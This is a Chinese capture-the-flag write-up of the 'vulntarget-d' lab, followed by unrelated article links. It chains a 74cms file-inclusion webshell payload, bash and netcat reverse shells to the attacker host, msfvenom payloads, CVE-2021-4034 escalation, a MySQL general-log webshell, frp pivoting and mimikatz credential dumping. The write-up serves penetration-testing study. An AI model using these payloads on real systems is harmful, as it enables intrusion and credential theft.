vulntarget-d

配置信息

系统 ip
kali 192.168.130.5
ubuntu 18 ip1: 192.168.130.8 ip2: 10.0.10.1
win7 10.0.10.134

网卡修改

ubuntu如果配置上双网卡没显示就如下操作:

// 修改配置文件

sudo vim /etc/network/interfaces

// 之后重启网络

sudo /etc/init.d/networking restart

文件内如下,也可以改成了静态的ip,这个随意。

最后用列出所有网卡查看修改的情况, 网卡配置完成。

实战

web打点

信息收集

发现了3306的MySQL有未授权,然后8888有个登录。

用fscan扫一下,发现8888那有个登录入口一眼宝塔, 81有个骑士cms。

在网页底部找到他的版本信息v6.0.20就可以去搜索历史漏洞。

骑士cms文件包含

去网上搜了利用的文章,先用post写入一句话。

variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

然后开始包含日志文件,日志文件要和当天的日期一致。

variable=1&tpl=data/Runtime/Logs/Home/23_08_21.log

这里有个点,当写的文件名是shell.php的时候会被宝塔给拦截了但是去Ubuntu里面看确实是写入了,这里直接换个文件名就ok的。

内网渗透

Ubuntu提权

连上哥斯拉上来丝滑三连发现第二个网段,转战msf进行提权。

本来想偷懒直接用哥斯拉反弹过去的,但是效果不好一下就会断掉。

老老实实传msf上去。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.130.5 LPORT=6666 -f elf > 110.elf

handler -p linux/x86/meterpreter/reverse_tcp -H 192.168.130.5 -P 6666

下载提权脚本来看看入手点,但是很奇怪赋权之后执行了报错。先在msf这里挂个提权模块待会等结果。

run post/multi/recon/local_exploit_suggester

在哥斯拉里面试了一下发现了报错,出现这个原因一般是函数被ban了。

按前面的步骤写一个phpinfo(),可以看到被ban的还挺多的。

看了一下它上面有vim,然后也找到了php.ini可以试着改一手,先反弹shell过去。

bash -i >& /dev/tcp/192.168.130.5/9999 0>&1

有python环境升级交互式shell,定位到php.ini。

但是是真离谱进不了命令行模式进行移动,esc, Ctrl + [, Ctrl+o都不行,Ctrl+c就直接断了。

完全交互式shell

搜到一个升级到完全交互式shell的方法,先用这种方式反弹shell。然后还是正常的升级交互式shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.105 6667 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")';

接着设置环境变量, Ctrl+z将shell发送到后台, 设置 shell 以通过反向 shell 发送控制字符和其他原始输入。使用以下stty命令来执行此操作。之后再输入reset。

export TERM=xterm    // 允许clear

Ctrl + z

stty raw -echo;fg

reset

然后此时就可以正常进入普通模式和命令模式,找到disable_functions的地方。

我真的服辣我是**。

回过头去看了一下msf的结果,有个cve-2021-4034

找到一个exp提权成功,exp传送门 GayHub - 全球最大 同性交友网站

流量转发

再运行之前的子上线msf,再创建路由入段(没找到chisel就寄希望于msf的socks试试)。

run autoroute -s 10.0.10.0/24

run autoroute -p

不成不成,太容易断了最后还是挂上frp,但是配置proxychains让fscan开扫扫不到一个?但是使用他内置的flag可以正常扫到。

这里可以看到除开本机和10.0.10.3, 就是10.0.10.2存活。

根据结果得知10.0.10.2是Win7,其他指纹信息没有什么有用的。

root@kali ~/Desktop » ./fscan_amd64 -h 10.0.10.1-128 -socks5 192.168.130.5:1515     

   ___                              _

  / _ \     ___  ___ _ __ __ _  ___| | __

 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /

/ /_\\_____\__ \ (__| | | (_| | (__|   <

\____/     |___/\___|_|  \__,_|\___|_|\_\

                     fscan version: 1.8.2

Socks5Proxy: socks5://192.168.130.5:1515

start infoscan

10.0.10.2:80 open

10.0.10.3:80 open

10.0.10.3:81 open

10.0.10.2:135 open

10.0.10.1:135 open

10.0.10.2:139 open

10.0.10.2:445 open

10.0.10.2:3306 open

10.0.10.3:3306 open

10.0.10.3:8080 open

10.0.10.3:888 open

10.0.10.3:1080 open

10.0.10.1:8082 open

10.0.10.3:8888 open

[*] alive ports len is: 14

start vulscan

[*] WebTitle: http://10.0.10.3          code:200 len:1326   title:没有找到站点

[*] NetInfo:

[*]10.0.10.1

   [->]Lockly

   [->]172.31.224.1

   [->]192.168.130.1

   [->]10.0.10.1

   [->]192.168.43.233

   [->]240e:468:f2f3:21c0:32c5:5ebe:ccd1:1d9

   [->]240e:468:f2f3:21c0:c9f6:cb76:c5d6:839d

[*] WebTitle: http://10.0.10.2          code:200 len:11     title:None

[*] WebTitle: http://10.0.10.3:8080     code:404 len:9      title:None

[*] 10.0.10.2  (Windows 7 Ultimate 7601 Service Pack 1)

[*] WebTitle: http://10.0.10.3:888      code:404 len:548    title:404 Not Found

[*] WebTitle: http://10.0.10.3:81       code:200 len:127210 title:骑士PHP高端人才系统(www.74cms.com)

[*] WebTitle: http://10.0.10.3:8888     code:302 len:219    title:Redirecting... 跳转url: http://10.0.10.3:8888/login

[*] NetInfo:

[*]10.0.10.2

   [->]WIN-D4S86JO2R26

   [->]10.0.10.2

[*] WebTitle: http://10.0.10.1:8082     code:400 len:18     title:None

已完成 14/14

[*] 扫描结束,耗时: 4m45.627909432s

这里奇怪的就是proxychains firefox是能正常访问到10.0.10.2他的站点的,但是挂给工具扫就是没用

真是鬼来了dirb和dirsearch走proxychains又是正常的,nmap,fscan一概扫不到。dirb结果有一个php探针和phpmyadin的登录页面。

除开这两个然后在dirb中还有一个l.php。

这个l.php是个php探针,底下连接数据库那里弱口令root:root一尝试就出来了。

全局日志写入一句话

查看全局日志是否开启,这里的原始位置可以留个记录,后续写完之后复原日志善始善终,但是这里显示有点问题我就没负责了。

SHOW GLOBAL VARIABLES LIKE '%general%';

开启全局日志,之后查看一下确认开了就OK。

SET GLOBAL GENERAL_LOG=ON;

SET GLOBAL GENERAL_LOG_FILE = 'C:/phpstudy/PHPTutorial/www/t.php';

将子写入日志。

select '<?php eval($_POST["hi"]);?>'

可以访问到t.php,连接上就没问题。

免杀上线

发现里面有火绒,要考虑做一下免杀。

免杀有时效性就没记录了,这台机器不出网,所以要用正向马。然后上传免杀之后,开启监听拿到了会话。

handler -p windows/meterpreter/bind_tcp -H 10.0.10.2 -P 4444

后续的图忘了截了,将进程迁移到64位上。用mimikatz抓密码,3389上才艺上去一眼就能看到flag。

vulntarget-d-wp的更多相关文章

  1. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  2. wp已死,metro是罪魁祸首!

    1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...

  3. 关于 WP 开发中.xaml 与.xaml.cs 的关系

    今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...

  4. Android,ios,WP三大手机系统对比

    从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...

  5. 搜狗输入法wp风格皮肤

    换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...

  6. 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19

    上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...

  7. 【WP开发】读写剪贴板

    在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...

  8. 【WP开发】不同客户端之间传输加密数据

    在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...

  9. 【WP开发】加密篇:双向加密

    说起双向加密,如果以前在.NET开发中弄过加/解密的朋友都不会陌生,常用的算法有DES.AES等.在RT应用程序中,也提供了加密相关的API,算法自然是一样的,只是API的封装方式不同罢了,因为RT不 ...

  10. 【WP 8.1开发】How to 图像处理

    在今天的吹牛节目开始之前,先交代一件事: 关于玩WP 8.1开发所使用的VS版本问题.对版本的要求是2013的Update2,这是最低要求,只要是这个版本或以上都可以,而update3,update4 ...

随机推荐

  1. 【matplotlib基础】--手绘风格

    Matplotlib 中有一个很有趣的手绘风格.如果不是特别严肃的分析报告,使用这个风格能给枯燥的数据分析图表带来一些活泼的感觉. 使用手绘风格非常简单,本篇主要手绘风格的效果以及如何配置中文的支持. ...

  2. 万字长文教你实现华为云IoT+OpenHarmony智能家居开发

    本文分享自华为云社区<华为云IoT+OpenHarmony的智能家居开发>,作者:袁睿. 一.选题说明 1. 选题为基于OpenHarmony的智能家居,应用场景为户用,受益人群为住户. ...

  3. Solution -「CSP-S 2020」函数调用

    Description 大家应该都读过题. Solution 赛后变摩托. 我们对每一个操作 \(3\) 连边建图,然后可以知道只是一个 \(\texttt{DAG}\). 考虑操作 \(2\),我们 ...

  4. Java四种引用 强引用,软引用,弱引用,虚引用(转)

    强引用 : 只要引用存在,垃圾回收器永远不会回收 Object obj= new Object(); Object 对象对后面 new Object的一个强引用, 只有当obj这个被释放之后,对象才会 ...

  5. ios ipa apple company 开发者账号申请分享攻略

    ios公司开发者账号申请分享攻略 好不容易终于申请下来了ios 公司开发者账号,真是一路艰辛和漫长啊,特别是对于远在大洋彼岸的大中华国家.以下我就分享一下这一路下来的经验,希望对于那些新手同仁们有所帮 ...

  6. day1 C语言:对于P1055 ISBN号码的代码优化及多解

    day1 C语言:对于P1055 ISBN号码的代码优化及多解 先看题目 直接说最优解,其他方法后置 第一部分 1.第一个点是数据的输入,本人第一的想法是直接用int类型去接受数据,但因为" ...

  7. 虹科喜报 | 虹科技术工程师【国内首批】拿下Redis认证开发者证书!

    要说虹科数据库技术工程师有多强悍,认证考试2022年12月上线,次年2月就以全国首批速度强势通过考试,并于两周后正式收到[Redis认证开发人员]证书! 虹科小云忍不住浅浅炫耀一下: 或许大家对Red ...

  8. APIO 2023 游记

    真心话大冒险很有趣. rand 一个房间去敲门加 QQ 很有趣.这么看社恐猫好像也没那么社恐. 面到了 zpl pcq iee dx.单方面认识了很多神仙. 比赛只会写暴力,评测 queue 害人不浅 ...

  9. idea 连接远程 docker 并部署项目到 docker

    目录 idea 连接远程 docker 1. 安装 docker 插件 2. 登录远程服务器,修改docker配置 3. 添加云服务器防火墙规则 4. idea 配置连接 docker 部署项目到 d ...

  10. IPv4:根据CIDR显示地址范围

    最近遇到一个很有意思的点,于是就记录下来. CIDR一般是由IP地址和子网掩码组成,即 IP地址/子网掩码 格式. 子网掩码表示前面地址中的前多少位,为网络位,后面部分代表主机部分.例如:192.16 ...